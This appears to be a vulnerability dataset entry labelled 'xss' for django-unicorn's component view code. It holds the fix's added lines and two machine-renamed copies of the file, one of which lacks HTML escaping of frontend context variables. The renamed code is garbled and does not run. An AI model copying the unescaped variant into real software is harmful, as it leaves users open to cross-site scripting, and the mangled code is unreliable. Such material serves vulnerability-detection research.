attribute_name
] = pickle.dumps(attribute_value)
except pickle.PickleError:
logger.warn(
f"Caching '{attribute_name}' failed because it could not be pickled."
)
pass
def _is_public(self, name: str) -> bool:
"""
Determines if the name should be sent in the context.
"""
# Ignore some standard attributes from TemplateView
protected_names = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
# Component methods
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
excludes = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
excludes = self.Meta.exclude
return not (
name.startswith("_")
or name in protected_names
or name in self._hook_methods_cache
or name in excludes
)
@staticmethod
@timed
def create(
component_id: str,
component_name: str,
component_key: str = "",
parent: "UnicornView" = None,
request: HttpRequest = None,
use_cache=True,
kwargs: Dict[str, Any] = {},
) -> "UnicornView":
"""
Find and instantiate a component class based on `component_name`.
Args:
param component_id: Id of the component. Required.
param component_name: Name of the component. Used to locate the correct `UnicornView`
component class and template if necessary. Required.
param component_key: Key of the component to allow multiple components of the same name
to be differentiated. Optional.
param parent: The parent component of the current component.
param kwargs: Keyword arguments for the component passed in from the template. Defaults to `{}`.
Returns:
Instantiated `UnicornView` component.
Raises `ComponentLoadError` if the component could not be loaded.
"""
assert component_id, "Component id is required"
assert component_name, "Component name is required"
@timed
def _get_component_class(
module_name: str, class_name: str
) -> Type[UnicornView]:
"""
Imports a component based on module and class name.
"""
module = importlib.import_module(module_name)
component_class = getattr(module, class_name)
return component_class
cache = caches[get_cache_alias()]
component_cache_key = f"unicorn:component:{component_id}"
cached_component = cache.get(component_cache_key)
if cached_component:
# Get the newest version of the parent from cache if it is available
# This needs to happen for Django cache because instances is pickled, so
# a change in the view won't be reflected automatically (like with the module
# cache) so it needs to be retrieved manually.
if cached_component.parent:
cached_parent_component = cache.get(
cached_component.parent.component_cache_key
)
if cached_parent_component:
cached_component.parent = cached_parent_component
cached_component.parent.setup(request)
else:
cached_component = constructed_views_cache.get(component_id)
if use_cache and cached_component:
# Note that `hydrate()` and `complete` don't need to be called here
# because this path only happens for re-rendering from the view
cached_component.setup(request)
cached_component._validate_called = False
cached_component.calls = []
logger.debug(f"Retrieve {component_id} from constructed views cache")
return cached_component
if component_id in views_cache:
(component_class, parent, kwargs) = views_cache[component_id]
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
logger.debug(f"Retrieve {component_id} from views cache")
return component
locations = []
if component_name in location_cache:
locations.append(location_cache[component_name])
else:
locations = get_locations(component_name)
# Store the last exception that got raised while looking for a component in case it is useful context
last_exception: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (class_name, module_name) in locations:
try:
component_class = _get_component_class(module_name, class_name)
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
# Put the location for the component name in a module cache
location_cache[component_name] = (class_name, module_name)
# Put the component's class in a module cache
views_cache[component_id] = (component_class, parent, kwargs)
# Put the instantiated component into a module cache and the Django cache
cacheable_component = None
try:
cacheable_component = get_cacheable_component(component)
except UnicornCacheError as e:
logger.warning(e)
if cacheable_component:
if COMPONENTS_MODULE_CACHE_ENABLED:
constructed_views_cache[component_id] = cacheable_component
cache.set(
cacheable_component.component_cache_key, cacheable_component
)
return component
except ModuleNotFoundError as e:
last_exception = e
except AttributeError as e:
last_exception = e
raise ComponentLoadError(
f"'{component_name}' component could not be loaded: {last_exception}"
) from last_exception
| xss | {
"code": [
"from django.utils.html import conditional_escape",
" safe_fields = []",
" if hasattr(self, \"Meta\") and hasattr(self.Meta, \"safe\"):",
" if isinstance(self.Meta.safe, Sequence):",
" for field_name in self.Meta.safe:",
" if field_name in frontend_context_variables:",
" safe_fields.append(field_name)",
" for (",
" frontend_context_variable_key,",
" frontend_context_variable_value,",
" ) in frontend_context_variables.items():",
" if (",
" isinstance(frontend_context_variable_value, str)",
" and frontend_context_variable_key not in safe_fields",
" ):",
" frontend_context_variables[frontend_context_variable_key] = escape(",
" frontend_context_variable_value",
" )"
],
"line_no": [
13,
344,
346,
347,
348,
349,
350,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385
]
} | {
"code": [],
"line_no": []
} | import importlib
import inspect
import logging
import pickle
import .sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import .settings
from django.core.cache import .caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.utils.html import conditional_escape
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import .serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
VAR_0 = logging.getLogger(__name__)
VAR_1 = LRUCache(maxsize=100)
VAR_2 = LRUCache(maxsize=100)
VAR_3 = LRUCache(maxsize=100)
VAR_4 = "pytest" not in sys.modules
def FUNC_0(VAR_5: str) -> str:
return VAR_5.replace("-", "_")
def FUNC_1(VAR_5: str) -> str:
VAR_5 = FUNC_0(VAR_5)
return "".join(word.title() for word in VAR_5.split("_"))
def FUNC_2(VAR_6):
VAR_13 = []
if "." in VAR_6:
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = VAR_6.split(".")[-1:][0]
VAR_15 = VAR_6.replace("." + VAR_14, "")
VAR_13.append((VAR_14, VAR_15))
if VAR_6.endswith("View") or VAR_6.endswith("Component"):
return VAR_13
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = FUNC_1(VAR_6)
if "." in VAR_14:
if VAR_14.split(".")[-1:]:
VAR_14 = VAR_14.split(".")[-1:][0]
VAR_14 = f"{VAR_14}View"
VAR_15 = FUNC_0(VAR_6)
VAR_16 = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(VAR_16, list)
or isinstance(VAR_16, tuple)
or isinstance(VAR_16, set)
), "APPS is expected to be a list, tuple or set"
for VAR_52 in VAR_16:
if ".apps." in VAR_52:
VAR_51 = VAR_52.rindex(".apps.")
VAR_52 = app[:VAR_51]
VAR_30 = f"{VAR_52}.components.{VAR_15}"
VAR_13.append((VAR_14, VAR_30))
return VAR_13
@timed
def FUNC_3(
VAR_7,
VAR_8,
VAR_6,
VAR_9,
VAR_10,
VAR_11,
**VAR_12,
):
VAR_17 = VAR_7(
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_17.calls = []
VAR_17.children = []
VAR_17._children_set = False
VAR_17.mount()
VAR_17.hydrate()
VAR_17.complete()
VAR_17._validate_called = False
return VAR_17
class CLASS_0(TemplateView):
VAR_18 = UnicornTemplateResponse
VAR_6: str = ""
VAR_9: str = ""
VAR_11 = None
VAR_10 = None
VAR_19 = []
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
_resettable_attributes_cache: Dict[str, Any] = {}
calls = []
def __init__(self, **VAR_12):
super().__init__(**VAR_12)
assert self.component_name, "Component VAR_24 is required"
if "id" in VAR_12 and VAR_12["id"]:
self.component_id = VAR_12["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:VAR_17:{self.component_id}"
if "request" in VAR_12:
self.setup(VAR_12["request"])
if "parent" in VAR_12:
self.parent = VAR_12["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def FUNC_4(self) -> None:
VAR_31 = False
try:
self.get_template_names()
VAR_31 = True
except ImproperlyConfigured:
pass
if not self.template_name and not VAR_31:
VAR_53 = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{VAR_53}.html"
@timed
def FUNC_5(self) -> None:
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def FUNC_6(self):
for (
VAR_55,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
VAR_59 = pickle.loads(pickled_value)
self._set_property(VAR_55, VAR_59)
except TypeError:
VAR_0.warn(
f"Resetting '{VAR_55}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
VAR_0.warn(
f"Resetting '{VAR_55}' attribute failed because it could not be de-pickled."
)
pass
def FUNC_7(self, VAR_21, *VAR_22):
self.calls.append({"fn": VAR_21, "args": VAR_22})
def FUNC_8(self):
pass
def FUNC_9(self):
pass
def FUNC_10(self):
pass
def FUNC_11(self, VAR_23):
pass
def FUNC_12(self, VAR_23):
pass
def FUNC_13(self, VAR_24, VAR_25):
pass
def FUNC_14(self, VAR_24, VAR_25):
pass
def FUNC_15(self, VAR_24, VAR_22):
pass
def FUNC_16(self, VAR_24, VAR_22):
pass
@timed
def FUNC_17(self, VAR_26=False) -> str:
VAR_32 = self.render_to_response(
VAR_39=self.get_context_data(), VAR_17=self, VAR_26=init_js,
)
if hasattr(VAR_32, "render"):
VAR_32.render()
VAR_33 = VAR_32.content.decode("utf-8")
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return VAR_33
@timed
def FUNC_18(self) -> str:
VAR_34 = {}
VAR_35 = self._attributes()
VAR_34.update(VAR_35)
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in VAR_34:
del VAR_34[field_name]
VAR_36 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "safe"):
if isinstance(self.Meta.safe, Sequence):
for field_name in self.Meta.safe:
if field_name in VAR_34:
VAR_36.append(field_name)
VAR_37 = self._get_form(VAR_35)
if VAR_37:
VAR_37.is_valid()
for VAR_67 in VAR_35.keys():
if VAR_67 in VAR_37.fields:
VAR_64 = VAR_37.fields[VAR_67]
if VAR_67 in VAR_37.cleaned_data:
VAR_66 = VAR_37.cleaned_data[VAR_67]
VAR_25 = VAR_64.widget.format_value(VAR_66)
if (
not hasattr(VAR_34[VAR_67], "strip")
or VAR_34[VAR_67].strip() != VAR_25
):
VAR_34[VAR_67] = VAR_25
for (
VAR_60,
frontend_context_variable_value,
) in VAR_34.items():
if (
isinstance(frontend_context_variable_value, str)
and VAR_60 not in VAR_36
):
VAR_34[VAR_60] = escape(
frontend_context_variable_value
)
VAR_38 = serializer.dumps(
VAR_34
)
return VAR_38
@timed
def FUNC_19(self, VAR_27):
if hasattr(self, "form_class"):
try:
VAR_37 = self.form_class(VAR_27)
VAR_37.is_valid()
return VAR_37
except Exception as e:
VAR_0.exception(e)
@timed
def FUNC_20(self, **VAR_12):
VAR_39 = super().get_context_data(**VAR_12)
VAR_35 = self._attributes()
VAR_39.update(VAR_35)
VAR_39.update(self._methods())
VAR_39.update({"unicorn": {"errors": self.errors}})
return VAR_39
@timed
def FUNC_21(self, VAR_28: List = None) -> bool:
return len(self.validate(VAR_28).keys()) == 0
@timed
def FUNC_22(self, VAR_28: List = None) -> Dict:
if self._validate_called:
return self.errors
self._validate_called = True
VAR_27 = self._attributes()
VAR_37 = self._get_form(VAR_27)
if VAR_37:
VAR_54 = VAR_37.errors.get_json_data(escape_html=True)
if self.errors:
VAR_61 = []
for VAR_67, VAR_25 in self.errors.items():
if VAR_67 in VAR_54:
self.errors[VAR_67] = VAR_25
else:
VAR_61.append(VAR_67)
for VAR_67 in VAR_61:
self.errors.pop(VAR_67)
if VAR_28 is not None:
for VAR_67, VAR_25 in VAR_54.items():
if VAR_67 in VAR_28:
self.errors[VAR_67] = VAR_25
else:
self.errors.update(VAR_54)
return self.errors
@timed
def FUNC_23(self) -> List[str]:
VAR_40 = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
VAR_41 = [VAR_24 for VAR_24 in VAR_40 if self._is_public(VAR_24)]
return VAR_41
@timed
def FUNC_24(self) -> Dict[str, Any]:
VAR_41 = self._attribute_names_cache
VAR_35 = {}
for VAR_55 in VAR_41:
VAR_35[VAR_55] = getattr(self, VAR_55)
return VAR_35
@timed
def FUNC_25(self, VAR_24, VAR_25):
VAR_27 = self._attributes()
VAR_27[VAR_24] = VAR_25
VAR_37 = self._get_form(VAR_27)
if VAR_37 and VAR_24 in VAR_37.fields and VAR_24 in VAR_37.cleaned_data:
if not hasattr(VAR_25, "strip") or VAR_37.cleaned_data[VAR_24] != VAR_25.strip():
VAR_25 = VAR_37.cleaned_data[VAR_24]
VAR_42 = f"updating_{VAR_24}"
if hasattr(self, VAR_42):
getattr(self, VAR_42)(VAR_25)
try:
setattr(self, VAR_24, VAR_25)
VAR_56 = f"updated_{VAR_24}"
if hasattr(self, VAR_56):
getattr(self, VAR_56)(VAR_25)
except AttributeError as e:
raise
@timed
def FUNC_26(self) -> Dict[str, Callable]:
if self._methods_cache:
return self._methods_cache
VAR_43 = inspect.getmembers(self, inspect.ismethod)
VAR_44 = [
method for method in VAR_43 if self._is_public(method[0])
]
VAR_45 = {k: v for (k, v) in VAR_44}
self._methods_cache = VAR_45
return VAR_45
@timed
def FUNC_27(self) -> None:
self._hook_methods_cache = []
for VAR_55 in self._attribute_names_cache:
VAR_42 = f"updating_{VAR_55}"
VAR_56 = f"updated_{VAR_55}"
VAR_57 = [VAR_42, VAR_56]
for VAR_21 in VAR_57:
if hasattr(self, VAR_21):
self._hook_methods_cache.append(VAR_21)
@timed
def FUNC_28(self) -> None:
self._resettable_attributes_cache = {}
for VAR_55, VAR_59 in self._attributes().items():
if isinstance(VAR_59, UnicornField):
self._resettable_attributes_cache[VAR_55] = pickle.dumps(
VAR_59
)
elif isinstance(VAR_59, Model):
if not VAR_59.pk:
if VAR_55 not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
VAR_55
] = pickle.dumps(VAR_59)
except pickle.PickleError:
VAR_0.warn(
f"Caching '{VAR_55}' failed because it could not be pickled."
)
pass
def FUNC_29(self, VAR_24: str) -> bool:
VAR_46 = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
VAR_47 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
VAR_47 = self.Meta.exclude
return not (
VAR_24.startswith("_")
or VAR_24 in VAR_46
or VAR_24 in self._hook_methods_cache
or VAR_24 in VAR_47
)
@staticmethod
@timed
def FUNC_30(
VAR_8: str,
VAR_6: str,
VAR_9: str = "",
VAR_10: "UnicornView" = None,
VAR_11: HttpRequest = None,
VAR_29=True,
VAR_12: Dict[str, Any] = {},
) -> "UnicornView":
assert VAR_8, "Component id is required"
assert VAR_6, "Component VAR_24 is required"
@timed
def FUNC_31(
VAR_15: str, VAR_14: str
) -> Type[CLASS_0]:
VAR_58 = importlib.import_module(VAR_15)
VAR_7 = getattr(VAR_58, VAR_14)
return VAR_7
VAR_48 = caches[get_cache_alias()]
VAR_49 = f"unicorn:VAR_17:{VAR_8}"
VAR_50 = VAR_48.get(VAR_49)
if VAR_50:
if VAR_50.parent:
VAR_62 = VAR_48.get(
VAR_50.parent.component_cache_key
)
if VAR_62:
VAR_50.parent = VAR_62
VAR_50.parent.setup(VAR_11)
else:
VAR_50 = VAR_3.get(VAR_8)
if VAR_29 and VAR_50:
VAR_50.setup(VAR_11)
VAR_50._validate_called = False
VAR_50.calls = []
VAR_0.debug(f"Retrieve {VAR_8} from constructed views cache")
return VAR_50
if VAR_8 in VAR_2:
(VAR_7, VAR_10, VAR_12) = VAR_2[VAR_8]
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_0.debug(f"Retrieve {VAR_8} from views cache")
return VAR_17
VAR_13 = []
if VAR_6 in VAR_1:
VAR_13.append(VAR_1[VAR_6])
else:
VAR_13 = FUNC_2(VAR_6)
VAR_65: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (VAR_14, VAR_15) in VAR_13:
try:
VAR_7 = FUNC_31(VAR_15, VAR_14)
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_1[VAR_6] = (VAR_14, VAR_15)
VAR_2[VAR_8] = (VAR_7, VAR_10, VAR_12)
VAR_63 = None
try:
VAR_63 = get_cacheable_component(VAR_17)
except UnicornCacheError as e:
VAR_0.warning(e)
if VAR_63:
if VAR_4:
VAR_3[VAR_8] = VAR_63
VAR_48.set(
VAR_63.component_cache_key, VAR_63
)
return VAR_17
except ModuleNotFoundError as e:
VAR_65 = e
except AttributeError as e:
VAR_65 = e
raise ComponentLoadError(
f"'{VAR_6}' VAR_17 could not be loaded: {VAR_65}"
) from VAR_65
| import importlib
import inspect
import logging
import pickle
import .sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import .settings
from django.core.cache import .caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import .serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
VAR_0 = logging.getLogger(__name__)
VAR_1 = LRUCache(maxsize=100)
VAR_2 = LRUCache(maxsize=100)
VAR_3 = LRUCache(maxsize=100)
VAR_4 = "pytest" not in sys.modules
def FUNC_0(VAR_5: str) -> str:
return VAR_5.replace("-", "_")
def FUNC_1(VAR_5: str) -> str:
VAR_5 = FUNC_0(VAR_5)
return "".join(word.title() for word in VAR_5.split("_"))
def FUNC_2(VAR_6):
VAR_13 = []
if "." in VAR_6:
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = VAR_6.split(".")[-1:][0]
VAR_15 = VAR_6.replace("." + VAR_14, "")
VAR_13.append((VAR_14, VAR_15))
if VAR_6.endswith("View") or VAR_6.endswith("Component"):
return VAR_13
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = FUNC_1(VAR_6)
if "." in VAR_14:
if VAR_14.split(".")[-1:]:
VAR_14 = VAR_14.split(".")[-1:][0]
VAR_14 = f"{VAR_14}View"
VAR_15 = FUNC_0(VAR_6)
VAR_16 = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(VAR_16, list)
or isinstance(VAR_16, tuple)
or isinstance(VAR_16, set)
), "APPS is expected to be a list, tuple or set"
for VAR_51 in VAR_16:
if ".apps." in VAR_51:
VAR_50 = VAR_51.rindex(".apps.")
VAR_51 = app[:VAR_50]
VAR_30 = f"{VAR_51}.components.{VAR_15}"
VAR_13.append((VAR_14, VAR_30))
return VAR_13
@timed
def FUNC_3(
VAR_7,
VAR_8,
VAR_6,
VAR_9,
VAR_10,
VAR_11,
**VAR_12,
):
VAR_17 = VAR_7(
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_17.calls = []
VAR_17.children = []
VAR_17._children_set = False
VAR_17.mount()
VAR_17.hydrate()
VAR_17.complete()
VAR_17._validate_called = False
return VAR_17
class CLASS_0(TemplateView):
VAR_18 = UnicornTemplateResponse
VAR_6: str = ""
VAR_9: str = ""
VAR_11 = None
VAR_10 = None
VAR_19 = []
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
_resettable_attributes_cache: Dict[str, Any] = {}
calls = []
def __init__(self, **VAR_12):
super().__init__(**VAR_12)
assert self.component_name, "Component VAR_24 is required"
if "id" in VAR_12 and VAR_12["id"]:
self.component_id = VAR_12["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:VAR_17:{self.component_id}"
if "request" in VAR_12:
self.setup(VAR_12["request"])
if "parent" in VAR_12:
self.parent = VAR_12["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def FUNC_4(self) -> None:
VAR_31 = False
try:
self.get_template_names()
VAR_31 = True
except ImproperlyConfigured:
pass
if not self.template_name and not VAR_31:
VAR_52 = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{VAR_52}.html"
@timed
def FUNC_5(self) -> None:
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def FUNC_6(self):
for (
VAR_54,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
VAR_58 = pickle.loads(pickled_value)
self._set_property(VAR_54, VAR_58)
except TypeError:
VAR_0.warn(
f"Resetting '{VAR_54}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
VAR_0.warn(
f"Resetting '{VAR_54}' attribute failed because it could not be de-pickled."
)
pass
def FUNC_7(self, VAR_21, *VAR_22):
self.calls.append({"fn": VAR_21, "args": VAR_22})
def FUNC_8(self):
pass
def FUNC_9(self):
pass
def FUNC_10(self):
pass
def FUNC_11(self, VAR_23):
pass
def FUNC_12(self, VAR_23):
pass
def FUNC_13(self, VAR_24, VAR_25):
pass
def FUNC_14(self, VAR_24, VAR_25):
pass
def FUNC_15(self, VAR_24, VAR_22):
pass
def FUNC_16(self, VAR_24, VAR_22):
pass
@timed
def FUNC_17(self, VAR_26=False) -> str:
VAR_32 = self.render_to_response(
VAR_38=self.get_context_data(), VAR_17=self, VAR_26=init_js,
)
if hasattr(VAR_32, "render"):
VAR_32.render()
VAR_33 = VAR_32.content.decode("utf-8")
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return VAR_33
@timed
def FUNC_18(self) -> str:
VAR_34 = {}
VAR_35 = self._attributes()
VAR_34.update(VAR_35)
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in VAR_34:
del VAR_34[field_name]
VAR_36 = self._get_form(VAR_35)
if VAR_36:
VAR_36.is_valid()
for VAR_65 in VAR_35.keys():
if VAR_65 in VAR_36.fields:
VAR_62 = VAR_36.fields[VAR_65]
if VAR_65 in VAR_36.cleaned_data:
VAR_64 = VAR_36.cleaned_data[VAR_65]
VAR_25 = VAR_62.widget.format_value(VAR_64)
if (
not hasattr(VAR_34[VAR_65], "strip")
or VAR_34[VAR_65].strip() != VAR_25
):
VAR_34[VAR_65] = VAR_25
VAR_37 = serializer.dumps(
VAR_34
)
return VAR_37
@timed
def FUNC_19(self, VAR_27):
if hasattr(self, "form_class"):
try:
VAR_36 = self.form_class(VAR_27)
VAR_36.is_valid()
return VAR_36
except Exception as e:
VAR_0.exception(e)
@timed
def FUNC_20(self, **VAR_12):
VAR_38 = super().get_context_data(**VAR_12)
VAR_35 = self._attributes()
VAR_38.update(VAR_35)
VAR_38.update(self._methods())
VAR_38.update({"unicorn": {"errors": self.errors}})
return VAR_38
@timed
def FUNC_21(self, VAR_28: List = None) -> bool:
return len(self.validate(VAR_28).keys()) == 0
@timed
def FUNC_22(self, VAR_28: List = None) -> Dict:
if self._validate_called:
return self.errors
self._validate_called = True
VAR_27 = self._attributes()
VAR_36 = self._get_form(VAR_27)
if VAR_36:
VAR_53 = VAR_36.errors.get_json_data(escape_html=True)
if self.errors:
VAR_59 = []
for VAR_65, VAR_25 in self.errors.items():
if VAR_65 in VAR_53:
self.errors[VAR_65] = VAR_25
else:
VAR_59.append(VAR_65)
for VAR_65 in VAR_59:
self.errors.pop(VAR_65)
if VAR_28 is not None:
for VAR_65, VAR_25 in VAR_53.items():
if VAR_65 in VAR_28:
self.errors[VAR_65] = VAR_25
else:
self.errors.update(VAR_53)
return self.errors
@timed
def FUNC_23(self) -> List[str]:
VAR_39 = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
VAR_40 = [VAR_24 for VAR_24 in VAR_39 if self._is_public(VAR_24)]
return VAR_40
@timed
def FUNC_24(self) -> Dict[str, Any]:
VAR_40 = self._attribute_names_cache
VAR_35 = {}
for VAR_54 in VAR_40:
VAR_35[VAR_54] = getattr(self, VAR_54)
return VAR_35
@timed
def FUNC_25(self, VAR_24, VAR_25):
VAR_27 = self._attributes()
VAR_27[VAR_24] = VAR_25
VAR_36 = self._get_form(VAR_27)
if VAR_36 and VAR_24 in VAR_36.fields and VAR_24 in VAR_36.cleaned_data:
if not hasattr(VAR_25, "strip") or VAR_36.cleaned_data[VAR_24] != VAR_25.strip():
VAR_25 = VAR_36.cleaned_data[VAR_24]
VAR_41 = f"updating_{VAR_24}"
if hasattr(self, VAR_41):
getattr(self, VAR_41)(VAR_25)
try:
setattr(self, VAR_24, VAR_25)
VAR_55 = f"updated_{VAR_24}"
if hasattr(self, VAR_55):
getattr(self, VAR_55)(VAR_25)
except AttributeError as e:
raise
@timed
def FUNC_26(self) -> Dict[str, Callable]:
if self._methods_cache:
return self._methods_cache
VAR_42 = inspect.getmembers(self, inspect.ismethod)
VAR_43 = [
method for method in VAR_42 if self._is_public(method[0])
]
VAR_44 = {k: v for (k, v) in VAR_43}
self._methods_cache = VAR_44
return VAR_44
@timed
def FUNC_27(self) -> None:
self._hook_methods_cache = []
for VAR_54 in self._attribute_names_cache:
VAR_41 = f"updating_{VAR_54}"
VAR_55 = f"updated_{VAR_54}"
VAR_56 = [VAR_41, VAR_55]
for VAR_21 in VAR_56:
if hasattr(self, VAR_21):
self._hook_methods_cache.append(VAR_21)
@timed
def FUNC_28(self) -> None:
self._resettable_attributes_cache = {}
for VAR_54, VAR_58 in self._attributes().items():
if isinstance(VAR_58, UnicornField):
self._resettable_attributes_cache[VAR_54] = pickle.dumps(
VAR_58
)
elif isinstance(VAR_58, Model):
if not VAR_58.pk:
if VAR_54 not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
VAR_54
] = pickle.dumps(VAR_58)
except pickle.PickleError:
VAR_0.warn(
f"Caching '{VAR_54}' failed because it could not be pickled."
)
pass
def FUNC_29(self, VAR_24: str) -> bool:
VAR_45 = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
VAR_46 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
VAR_46 = self.Meta.exclude
return not (
VAR_24.startswith("_")
or VAR_24 in VAR_45
or VAR_24 in self._hook_methods_cache
or VAR_24 in VAR_46
)
@staticmethod
@timed
def FUNC_30(
VAR_8: str,
VAR_6: str,
VAR_9: str = "",
VAR_10: "UnicornView" = None,
VAR_11: HttpRequest = None,
VAR_29=True,
VAR_12: Dict[str, Any] = {},
) -> "UnicornView":
assert VAR_8, "Component id is required"
assert VAR_6, "Component VAR_24 is required"
@timed
def FUNC_31(
VAR_15: str, VAR_14: str
) -> Type[CLASS_0]:
VAR_57 = importlib.import_module(VAR_15)
VAR_7 = getattr(VAR_57, VAR_14)
return VAR_7
VAR_47 = caches[get_cache_alias()]
VAR_48 = f"unicorn:VAR_17:{VAR_8}"
VAR_49 = VAR_47.get(VAR_48)
if VAR_49:
if VAR_49.parent:
VAR_60 = VAR_47.get(
VAR_49.parent.component_cache_key
)
if VAR_60:
VAR_49.parent = VAR_60
VAR_49.parent.setup(VAR_11)
else:
VAR_49 = VAR_3.get(VAR_8)
if VAR_29 and VAR_49:
VAR_49.setup(VAR_11)
VAR_49._validate_called = False
VAR_49.calls = []
VAR_0.debug(f"Retrieve {VAR_8} from constructed views cache")
return VAR_49
if VAR_8 in VAR_2:
(VAR_7, VAR_10, VAR_12) = VAR_2[VAR_8]
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_0.debug(f"Retrieve {VAR_8} from views cache")
return VAR_17
VAR_13 = []
if VAR_6 in VAR_1:
VAR_13.append(VAR_1[VAR_6])
else:
VAR_13 = FUNC_2(VAR_6)
VAR_63: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (VAR_14, VAR_15) in VAR_13:
try:
VAR_7 = FUNC_31(VAR_15, VAR_14)
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
